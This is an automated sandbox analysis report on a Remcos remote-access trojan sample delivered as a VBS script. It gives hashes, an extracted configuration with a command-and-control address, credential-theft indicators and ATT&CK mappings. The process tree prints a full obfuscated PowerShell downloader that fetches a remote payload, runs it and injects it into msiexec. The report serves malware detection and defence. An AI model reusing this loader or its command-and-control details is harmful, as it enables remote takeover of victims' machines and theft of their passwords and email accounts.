remcos | ad2aa163a40ed711cf8d945c9f4c035eb257e67d8987648c98e9578578f2f544

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-10-2024 06:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MV OCEAN PRIDE.vbs
Size

214KB
MD5

7eaa8d136858efb4573938706338096f
SHA1

4e0b80849f1164c7943946987c15f32a43dba223
SHA256

57eab6c4e70ae89f96d173062df0ef84292e6315d474cb416f5c776b489cc3da
SHA512

06f909e47acbc1f238881526e70da2a6cbdf1e5fc3eb019bb8f758042b8c2498c73bc4cb77f7b835dcfc9064fa4d79d4de189c3aa50e2a661e35c96e9b512af0
SSDEEP

6144:gAOTDoRQRWAgAHNSjH1EWMS/RT/Sfj986x8WIERjNNkSkwwihiW3J0GYeduNvbdH:9lH6z0T2bg

Score

10^/10

remcos remotehost collection discovery rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

154.216.18.214:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AOD6MB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3912-58-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3300-56-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4696-59-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3300-56-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4696-59-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
8	512	powershell.exe
10	3704	msiexec.exe
11	3704	msiexec.exe
13	3704	msiexec.exe
14	3704	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3704	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4952	powershell.exe
3704	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3704 set thread context of 4696	3704	msiexec.exe	92
PID 3704 set thread context of 3300	3704	msiexec.exe	93
PID 3704 set thread context of 3912	3704	msiexec.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
512	powershell.exe
512	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
3912	msiexec.exe
3912	msiexec.exe
4696	msiexec.exe
4696	msiexec.exe
4696	msiexec.exe
4696	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4952	powershell.exe
3704	msiexec.exe
3704	msiexec.exe
3704	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	3912	msiexec.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 512	1960	WScript.exe	86
PID 1960 wrote to memory of 512	1960	WScript.exe	86
PID 4952 wrote to memory of 3704	4952	powershell.exe	90
PID 4952 wrote to memory of 3704	4952	powershell.exe	90
PID 4952 wrote to memory of 3704	4952	powershell.exe	90
PID 4952 wrote to memory of 3704	4952	powershell.exe	90
PID 3704 wrote to memory of 4696	3704	msiexec.exe	92
PID 3704 wrote to memory of 4696	3704	msiexec.exe	92
PID 3704 wrote to memory of 4696	3704	msiexec.exe	92
PID 3704 wrote to memory of 4696	3704	msiexec.exe	92
PID 3704 wrote to memory of 3300	3704	msiexec.exe	93
PID 3704 wrote to memory of 3300	3704	msiexec.exe	93
PID 3704 wrote to memory of 3300	3704	msiexec.exe	93
PID 3704 wrote to memory of 3300	3704	msiexec.exe	93
PID 3704 wrote to memory of 3912	3704	msiexec.exe	94
PID 3704 wrote to memory of 3912	3704	msiexec.exe	94
PID 3704 wrote to memory of 3912	3704	msiexec.exe	94
PID 3704 wrote to memory of 3912	3704	msiexec.exe	94

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV OCEAN PRIDE.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Computerstyre Creatinephosphoric reheal Papillated Dieldrins Rosseaus #>;$Hustelefonerne='Unwintry';<#leeky Kastreringers stegepanden #>;$Vetiveria=$Hagerem+$host.UI;If ($Vetiveria) {$Forhjede++;}function Ophjningen($jovialt){$Genfandt=$Uddannelsessttte+$jovialt.Length-$Forhjede; for( $Bogtilrettelgningen=3;$Bogtilrettelgningen -lt $Genfandt;$Bogtilrettelgningen+=4){$skinverdnernes='skohorns';$Elementhuses188+=$jovialt[$Bogtilrettelgningen];$Affolkningen='sprngt';}$Elementhuses188;}function Flderandene($Dataforbindelse){ . ($Camail) ($Dataforbindelse);}$Opslugninger=Ophjningen 'GodMLinoTryzKrei ltl I l siaMan/abe5 ,u.Eas0sto ro(TotW UsiThinRe.dNs o hw Als hi p.NAfsT Mo Nec1Bo 0 In.syr0Ove;Apo KurWTipiAllnFr 6Jam4sny; al lulxslr6 ,a4Exp;Tul UnirLatv .h: Dh1Ovo2ter1 Ar.In 0Apo)sis BdkG Miedimc ,okG,foA p/Mid2Art0Pri1se.0Mun0 fo1 a0Avi1 K RevFpliiE er reeCyafVigoDisxstu/Br 1Hal2 fo1Glu.Rod0An ';$systemopstningerne=Ophjningen 'ForuTers uoeBefr ak-.elAKatGMi e unnEmbt ve ';$Antedaterede=Ophjningen 'Chrh eftZ itNonpAfr:U s/ sc/.ele,raq FouBraiKlup pl4Clo.Fris ihChloUnfpFor/ nYKorqGilrPoreN nE f k TaF K.OD a/PreRDure BasH rtRapaReauaucrstueGrarslaeFrid leePoss a.UnfdParwMacpK v ';$Burian=Ophjningen 'Ba >Tvi ';$Camail=Ophjningen 'Noni o.EPr XArt ';$Rensdyrlavernes='Catharism';$Redningsvestes='\Vejplade.Agg';Flderandene (Ophjningen ' F,$oveg .al aOsc.B BrAKorLspk:Trul,esA K NBeidBrurMilY pv=Her$GanEspaNF gv r:sy.aHelPE ep Apd KaaKolttulAAsc+Ov $Jagr Exe E dHunn OviUskNRepgMunsUlvvstoeTr.s.igTbedeGo sCry ');Flderandene (Ophjningen ',yd$VinG hel .aOs lBNovAImpLCor:EnsC BuAPe,rskuLsw y solReaeOvesEftq eduUnve sa=Afs$Guda bonC etVolEBrydheiaH uTLyseustRmi,eH,ld Koesty.OvesAmpPR,clResIF etstr(Kla$ inbB eUE,cR ReI.piADosNsp )I,t ');Flderandene (Ophjningen 'Coa[ nnnLedeFadTK.l. its M.EM crG mVnonIOveCPleE,elPUnao TrIMarnchatId,MAt A NuNCata s GUnrE rrTit]sla:Oph:Decs krEVolc PeuAtoROl I ytre yP.aPbefr jnOPortAn,O GeCCryOPasl La Ben=Pre non[lanNConE tytCol.C ls deKa.C,ndustarr gI tetT.rysl,pCh.rFr,OMouTMadoPlacTiloPselAnlt Ury,kkpAr eLec]Ho,:Rad: Kit,opLpt,s,ol1 Ch2Mon ');$Antedaterede=$Carlylesque[0];$Fishiness=(Ophjningen ' y$F jgJiblb.eosaiB U aOrdlski:Plkl agIvddnHoyoTroL Bre,jrU,wemComsvart mnrHasYsp.KEn = ofn she dowsfr-Te OPlab epjAntEZapcKontOrd FlsT,iyVilsRegt sueHalm.na..rrn eaEMiaTIn,.MagWQuiE s BKr C lgL akiIn E ornKrat h. ');Flderandene ($Fishiness);Flderandene (Ophjningen 'Eft$FerLseliOblnBuroPeelProe caugrim Als ortInfr styLaakTet.BueHIn,eUnpatutdBrueHarrPinsPho[shl$samsHumyr ysn utB aeUltm CioIndp alsHumtKi,nPhoiKonnPa.gBuseslurcu nPreeDis].en=M l$Nu O prpheas Dil R,u ,egAk,ntalihy.nMengFlaesigrVkk ');$Aprjtelakeringsvrkstedet=Ophjningen 'A c$BicLCoti un NioDislAmeeTi uskam KosEmbttidrEsty.bak Pe.KikDLeuoManwN nn gel VaoI daMasdManF Hyi orl.aresta(Ov $RomAtetn KetBeheReidD.aafh tmuzeIntrO ye Fyd niesyv,sho$dveYKryuUv.rByluKunkB.l) ig ';$Yuruk=$Landry;Flderandene (Ophjningen ' Pl$ F gF nl OuOslvB Ela LilMer:Vocs stKWa r FiUC ietreB,huLlivyArvaVanNNonT ste,anrUnbN InE Faswee=Cau(indT OseAnhs Klt ,l-OutPsuba TrTRe,h sw Ka$Napy KoURanrParUAchKPom)Lev ');while (!$skrueblyanternes) {Flderandene (Ophjningen ' on$s,bgRyglResoHerb etaUnpl so:sapN ReaDuorO,prRig=sn.$Fo t agrWhou heRea ') ;Flderandene $Aprjtelakeringsvrkstedet;Flderandene (Ophjningen 'Dk sursTMopaGe rGaptEnf-Excsforl AvEsjae vpKol H 4Elo ');Flderandene (Ophjningen 'Arm$BenGRebl CyoGenbLinAU slPhi:sers usKBilRVidUErheEr,B,ilLs,dy.jaA Men .rTEmeeMyeRUdsNFraETids .o= on(antt.aceAl.s OrT .a-At p MuaUsmTAdmHFor saf$IntYs iuproRTiduNo K,ni)Opt ') ;Flderandene (Ophjningen 'sim$ExtGAskLOpiosteB.ilaAp,L De:B.lDAm E,eemscriCtelFabiBehtHu,e otR .eAV,tTUlae Br=Fa.$PsyG eglDo.OEo Bfora FlLDid:slrestrustiDDatEKniMEcto H,nHy.i,arA Dr+Ge,+Rag%Vej$subc araDejRNaplOveys oLTekEUnssO,eqFl,ustiEsel.stiCNetO roUBioNFort.rf ') ;$Antedaterede=$Carlylesque[$Demiliterate];}$Foliant130=308079;$Faceable=28513;Flderandene (Ophjningen ' t$Unrgf.nL,enO C.b,emA .plhom:Pe,s anUKi pHanEHotR uE PlxT oC KarInaeZ.os RucInte K nallt ar9 ca4Tra er = va ChGPareZootKon-Anac ByO Adn A T MaEJo.nptat Fl R a$PhoY FoUPraR,aruL uKFor ');Flderandene (Ophjningen ' i$sneg n lAntoUskb ha smlGai:UopBBdniTralU st njoAc.gUdje ertPu s sc2 am0Typ3C.r ,et=Di. Des[ asAmtyswasKrytL.uesp,mVes. olC H oFygn rovNj,ePatrCo t ma] Un:ste:R fF itrWaloChum,euBFllaMids HjeUno6 En4 sesP.atsymrBehiAr,n AlgUni( Ci$IncsG aucorp UnePhrr efehldxClacsisrI.ceNa s abcKrse TinUn t Un9 Gl4 re) P. ');Flderandene (Ophjningen ' n$salG AnlrowoFa b fraJesl na:InksM shNona .nmUnco oYPasIKigNHubGs y su =.ov Pi[ ilsVe Y .isNegTEpie emspe.H lt,sbEmozxM rTEcp.EchEA bn.auCk noReld HeI ,wNMisg en] T :E,u:Wiea U skalcsubiDonI er. HaGGrieUncT asRinT H RUnaispnn GygRe ( ra$Boub D.I elBttTEndO,adg ge smTsk ssud2Div0Fi 3Ind)Udk ');Flderandene (Ophjningen ' B $TilGN.nlParORa.bUn,as olskd: PhaPu DBasEverQResU seAMelTWo i emo paN s =skr$DevsF nHTr A s M ocokalysl,iMonnPolGKam. MasHybu Lob onssa TL tR .cIBranH,vGs l(W,t$Af f .io W.LUniI,riaKalnRest ar1 a3spr0Inf,Unm$Ti FBraaFibCEksesu,ADagbKlolReceIde)Ced ');Flderandene $Adequation;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Computerstyre Creatinephosphoric reheal Papillated Dieldrins Rosseaus #>;$Hustelefonerne='Unwintry';<#leeky Kastreringers stegepanden #>;$Vetiveria=$Hagerem+$host.UI;If ($Vetiveria) {$Forhjede++;}function Ophjningen($jovialt){$Genfandt=$Uddannelsessttte+$jovialt.Length-$Forhjede; for( $Bogtilrettelgningen=3;$Bogtilrettelgningen -lt $Genfandt;$Bogtilrettelgningen+=4){$skinverdnernes='skohorns';$Elementhuses188+=$jovialt[$Bogtilrettelgningen];$Affolkningen='sprngt';}$Elementhuses188;}function Flderandene($Dataforbindelse){ . ($Camail) ($Dataforbindelse);}$Opslugninger=Ophjningen 'GodMLinoTryzKrei ltl I l siaMan/abe5 ,u.Eas0sto ro(TotW UsiThinRe.dNs o hw Als hi p.NAfsT Mo Nec1Bo 0 In.syr0Ove;Apo KurWTipiAllnFr 6Jam4sny; al lulxslr6 ,a4Exp;Tul UnirLatv .h: Dh1Ovo2ter1 Ar.In 0Apo)sis BdkG Miedimc ,okG,foA p/Mid2Art0Pri1se.0Mun0 fo1 a0Avi1 K RevFpliiE er reeCyafVigoDisxstu/Br 1Hal2 fo1Glu.Rod0An ';$systemopstningerne=Ophjningen 'ForuTers uoeBefr ak-.elAKatGMi e unnEmbt ve ';$Antedaterede=Ophjningen 'Chrh eftZ itNonpAfr:U s/ sc/.ele,raq FouBraiKlup pl4Clo.Fris ihChloUnfpFor/ nYKorqGilrPoreN nE f k TaF K.OD a/PreRDure BasH rtRapaReauaucrstueGrarslaeFrid leePoss a.UnfdParwMacpK v ';$Burian=Ophjningen 'Ba >Tvi ';$Camail=Ophjningen 'Noni o.EPr XArt ';$Rensdyrlavernes='Catharism';$Redningsvestes='\Vejplade.Agg';Flderandene (Ophjningen ' F,$oveg .al aOsc.B BrAKorLspk:Trul,esA K NBeidBrurMilY pv=Her$GanEspaNF gv r:sy.aHelPE ep Apd KaaKolttulAAsc+Ov $Jagr Exe E dHunn OviUskNRepgMunsUlvvstoeTr.s.igTbedeGo sCry ');Flderandene (Ophjningen ',yd$VinG hel .aOs lBNovAImpLCor:EnsC BuAPe,rskuLsw y solReaeOvesEftq eduUnve sa=Afs$Guda bonC etVolEBrydheiaH uTLyseustRmi,eH,ld Koesty.OvesAmpPR,clResIF etstr(Kla$ inbB eUE,cR ReI.piADosNsp )I,t ');Flderandene (Ophjningen 'Coa[ nnnLedeFadTK.l. its M.EM crG mVnonIOveCPleE,elPUnao TrIMarnchatId,MAt A NuNCata s GUnrE rrTit]sla:Oph:Decs krEVolc PeuAtoROl I ytre yP.aPbefr jnOPortAn,O GeCCryOPasl La Ben=Pre non[lanNConE tytCol.C ls deKa.C,ndustarr gI tetT.rysl,pCh.rFr,OMouTMadoPlacTiloPselAnlt Ury,kkpAr eLec]Ho,:Rad: Kit,opLpt,s,ol1 Ch2Mon ');$Antedaterede=$Carlylesque[0];$Fishiness=(Ophjningen ' y$F jgJiblb.eosaiB U aOrdlski:Plkl agIvddnHoyoTroL Bre,jrU,wemComsvart mnrHasYsp.KEn = ofn she dowsfr-Te OPlab epjAntEZapcKontOrd FlsT,iyVilsRegt sueHalm.na..rrn eaEMiaTIn,.MagWQuiE s BKr C lgL akiIn E ornKrat h. ');Flderandene ($Fishiness);Flderandene (Ophjningen 'Eft$FerLseliOblnBuroPeelProe caugrim Als ortInfr styLaakTet.BueHIn,eUnpatutdBrueHarrPinsPho[shl$samsHumyr ysn utB aeUltm CioIndp alsHumtKi,nPhoiKonnPa.gBuseslurcu nPreeDis].en=M l$Nu O prpheas Dil R,u ,egAk,ntalihy.nMengFlaesigrVkk ');$Aprjtelakeringsvrkstedet=Ophjningen 'A c$BicLCoti un NioDislAmeeTi uskam KosEmbttidrEsty.bak Pe.KikDLeuoManwN nn gel VaoI daMasdManF Hyi orl.aresta(Ov $RomAtetn KetBeheReidD.aafh tmuzeIntrO ye Fyd niesyv,sho$dveYKryuUv.rByluKunkB.l) ig ';$Yuruk=$Landry;Flderandene (Ophjningen ' Pl$ F gF nl OuOslvB Ela LilMer:Vocs stKWa r FiUC ietreB,huLlivyArvaVanNNonT ste,anrUnbN InE Faswee=Cau(indT OseAnhs Klt ,l-OutPsuba TrTRe,h sw Ka$Napy KoURanrParUAchKPom)Lev ');while (!$skrueblyanternes) {Flderandene (Ophjningen ' on$s,bgRyglResoHerb etaUnpl so:sapN ReaDuorO,prRig=sn.$Fo t agrWhou heRea ') ;Flderandene $Aprjtelakeringsvrkstedet;Flderandene (Ophjningen 'Dk sursTMopaGe rGaptEnf-Excsforl AvEsjae vpKol H 4Elo ');Flderandene (Ophjningen 'Arm$BenGRebl CyoGenbLinAU slPhi:sers usKBilRVidUErheEr,B,ilLs,dy.jaA Men .rTEmeeMyeRUdsNFraETids .o= on(antt.aceAl.s OrT .a-At p MuaUsmTAdmHFor saf$IntYs iuproRTiduNo K,ni)Opt ') ;Flderandene (Ophjningen 'sim$ExtGAskLOpiosteB.ilaAp,L De:B.lDAm E,eemscriCtelFabiBehtHu,e otR .eAV,tTUlae Br=Fa.$PsyG eglDo.OEo Bfora FlLDid:slrestrustiDDatEKniMEcto H,nHy.i,arA Dr+Ge,+Rag%Vej$subc araDejRNaplOveys oLTekEUnssO,eqFl,ustiEsel.stiCNetO roUBioNFort.rf ') ;$Antedaterede=$Carlylesque[$Demiliterate];}$Foliant130=308079;$Faceable=28513;Flderandene (Ophjningen ' t$Unrgf.nL,enO C.b,emA .plhom:Pe,s anUKi pHanEHotR uE PlxT oC KarInaeZ.os RucInte K nallt ar9 ca4Tra er = va ChGPareZootKon-Anac ByO Adn A T MaEJo.nptat Fl R a$PhoY FoUPraR,aruL uKFor ');Flderandene (Ophjningen ' i$sneg n lAntoUskb ha smlGai:UopBBdniTralU st njoAc.gUdje ertPu s sc2 am0Typ3C.r ,et=Di. Des[ asAmtyswasKrytL.uesp,mVes. olC H oFygn rovNj,ePatrCo t ma] Un:ste:R fF itrWaloChum,euBFllaMids HjeUno6 En4 sesP.atsymrBehiAr,n AlgUni( Ci$IncsG aucorp UnePhrr efehldxClacsisrI.ceNa s abcKrse TinUn t Un9 Gl4 re) P. ');Flderandene (Ophjningen ' n$salG AnlrowoFa b fraJesl na:InksM shNona .nmUnco oYPasIKigNHubGs y su =.ov Pi[ ilsVe Y .isNegTEpie emspe.H lt,sbEmozxM rTEcp.EchEA bn.auCk noReld HeI ,wNMisg en] T :E,u:Wiea U skalcsubiDonI er. HaGGrieUncT asRinT H RUnaispnn GygRe ( ra$Boub D.I elBttTEndO,adg ge smTsk ssud2Div0Fi 3Ind)Udk ');Flderandene (Ophjningen ' B $TilGN.nlParORa.bUn,as olskd: PhaPu DBasEverQResU seAMelTWo i emo paN s =skr$DevsF nHTr A s M ocokalysl,iMonnPolGKam. MasHybu Lob onssa TL tR .cIBranH,vGs l(W,t$Af f .io W.LUniI,riaKalnRest ar1 a3spr0Inf,Unm$Ti FBraaFibCEksesu,ADagbKlolReceIde)Ced ');Flderandene $Adequation;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rsuysc"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4696
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cuajtmppru"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:3300
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mofcufzrfcwlq"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95e1c8db6eb5be60fa7c5f7ca36bfaed

SHA1
5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9

SHA256
3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18

SHA512
de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5ia2xlr.gab.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rsuysc

Filesize
4KB

MD5
75379d3dcbcea6a69bc75b884816dd40

SHA1
7e073a03c3bdbbc60375ddbe56bba211c3d412a6

SHA256
cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

SHA512
710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

Download Submit
C:\Users\Admin\AppData\Roaming\Vejplade.Agg

Filesize
438KB

MD5
f7ef9f2891ffa6b06eed27bd096f7ea0

SHA1
c436262d099bcea56a945d5afe8ddb4afb24c1c7

SHA256
3a089865224dda711a5aabb337813594e0d44a70897d9a5af6214600c7059691

SHA512
d871dfbd399cb669ef6a5f5b1131b1caf67f81228d8bf522f89d836e45bf2302b32f23535ef006cfcb484cbe73990b2e2ed96cf33455dcec15123dd0376f6540

Download Submit
memory/512-11-0x00007FF8026F0000-0x00007FF8031B1000-memory.dmp

Filesize
10.8MB

Download
memory/512-15-0x00007FF8026F0000-0x00007FF8031B1000-memory.dmp

Filesize
10.8MB

Download
memory/512-16-0x00007FF8026F0000-0x00007FF8031B1000-memory.dmp

Filesize
10.8MB

Download
memory/512-18-0x00007FF8026F0000-0x00007FF8031B1000-memory.dmp

Filesize
10.8MB

Download
memory/512-12-0x00007FF8026F0000-0x00007FF8031B1000-memory.dmp

Filesize
10.8MB

Download
memory/512-0-0x00007FF8026F3000-0x00007FF8026F5000-memory.dmp

Filesize
8KB

Download
memory/512-10-0x000001622E9D0000-0x000001622E9F2000-memory.dmp

Filesize
136KB

Download
memory/3300-56-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3300-50-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3300-55-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3704-73-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-65-0x000000001F3B0000-0x000000001F3C9000-memory.dmp

Filesize
100KB

Download
memory/3704-75-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-72-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-71-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-70-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-69-0x000000001F3B0000-0x000000001F3C9000-memory.dmp

Filesize
100KB

Download
memory/3704-68-0x000000001F3B0000-0x000000001F3C9000-memory.dmp

Filesize
100KB

Download
memory/3704-76-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-74-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-44-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-77-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-78-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-81-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3704-79-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3912-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3912-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3912-51-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4696-49-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4696-52-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4696-59-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4696-54-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4952-43-0x0000000008D10000-0x0000000009DE4000-memory.dmp

Filesize
16.8MB

Download
memory/4952-41-0x0000000008760000-0x0000000008D04000-memory.dmp

Filesize
5.6MB

Download
memory/4952-40-0x00000000074F0000-0x0000000007512000-memory.dmp

Filesize
136KB

Download
memory/4952-39-0x0000000007550000-0x00000000075E6000-memory.dmp

Filesize
600KB

Download
memory/4952-38-0x0000000006890000-0x00000000068AA000-memory.dmp

Filesize
104KB

Download
memory/4952-37-0x0000000007B30000-0x00000000081AA000-memory.dmp

Filesize
6.5MB

Download
memory/4952-36-0x0000000006320000-0x000000000636C000-memory.dmp

Filesize
304KB

Download
memory/4952-35-0x00000000062E0000-0x00000000062FE000-memory.dmp

Filesize
120KB

Download
memory/4952-33-0x0000000005C90000-0x0000000005FE4000-memory.dmp

Filesize
3.3MB

Download
memory/4952-23-0x0000000005BE0000-0x0000000005C46000-memory.dmp

Filesize
408KB

Download
memory/4952-22-0x00000000054B0000-0x0000000005516000-memory.dmp

Filesize
408KB

Download
memory/4952-21-0x0000000005410000-0x0000000005432000-memory.dmp

Filesize
136KB

Download
memory/4952-20-0x00000000055B0000-0x0000000005BD8000-memory.dmp

Filesize
6.2MB

Download
memory/4952-19-0x00000000029B0000-0x00000000029E6000-memory.dmp

Filesize
216KB

Download